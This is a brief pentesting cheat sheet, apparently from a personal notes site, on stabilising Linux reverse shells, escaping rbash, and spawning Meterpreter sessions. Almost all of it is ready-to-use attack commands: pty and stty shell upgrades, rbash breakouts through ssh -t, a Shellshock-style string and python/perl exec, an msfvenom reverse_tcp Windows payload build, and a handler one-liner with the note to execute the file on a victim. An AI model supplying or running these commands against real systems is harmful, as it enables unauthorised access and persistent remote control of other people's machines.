Neko

Shell Stabilisation

How to fix your shells and escape rbash

Last updated: May 4th, 2023

Stabilising a Linux Shell

There are two general approaches to this. If the first doesn't work, try the second.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

## or

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm; export SHELL=/bin/bash
CTRL+Z
stty raw -echo;fg

Escaping rbash

  1. env
  2. echo $PATH
  3. echo $SHELL
  4. check what's allowed
    • if / is allowed what about /bin/sh?
    • if unix commands are allowed, try cp /bin/sh /dir/from/PATH; sh
    • can you use export?
  5. ssh
    • ssh user@x.x.x.x -t “/bin/bash”
    • ssh user@x.x.x.x -t “bash --noprofile”
    • ssh user@x.x.x.x -t “() {:;}; /bin/bash”
  6. file writing
    • echo “code” | tee script.sh
    • python -c 'import os; os.system(”/bin/bash")'
    • perl -e ‘exec “/bin/bash”;’

Spawning a Meterpreter Shell

  • using shell_to_meterpreter
    • #in msfconsole
use shell_to
set session 1
  • creating an executable
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.180.131 LPORT=4444 -f exe -o shell.exe
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.180.131; set LPORT 4444; run"
#execute file on victim somehow